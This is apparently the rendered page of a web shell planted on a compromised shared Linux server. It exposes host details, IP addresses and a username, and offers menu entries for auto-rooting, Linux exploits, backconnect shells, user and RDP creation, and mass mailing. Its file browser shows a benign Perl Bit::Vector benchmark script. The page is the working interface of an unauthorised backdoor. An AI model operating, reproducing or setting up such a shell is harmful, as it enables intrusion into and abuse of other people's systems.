Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libbit-vector-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
SetObject.pl.gz
1.15
KB
-rw-r--r--
benchmk1.pl
461
B
-rwxr-xr-x
benchmk2.pl
673
B
-rwxr-xr-x
benchmk3.pl
1.03
KB
-rwxr-xr-x
primes.pl
2.57
KB
-rwxr-xr-x
test.c
3.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : benchmk2.pl
#!/usr/bin/perl use Benchmark; use Bit::Vector::String; $v = Bit::Vector->new(1024); $v->Primes(); $s = ''; $b = $v->to_Bin(); $o = $v->to_Oct(); $h = $v->to_Hex(); sub to_Bin { $s = $v->to_Bin(); } sub to_Oct { $s = $v->to_Oct(); } sub to_Hex { $s = $v->to_Hex(); } sub from_Bin { $v->from_Bin($b); } sub from_Oct { $v->from_Oct($o); } sub from_Hex { $v->from_Hex($h); } timethese ( 10000, { to_Bin => \&to_Bin, to_Oct => \&to_Oct, to_Hex => \&to_Hex } ); timethese ( 10000, { from_Bin => \&from_Bin, from_Oct => \&from_Oct, from_Hex => \&from_Hex } ); __END__
Close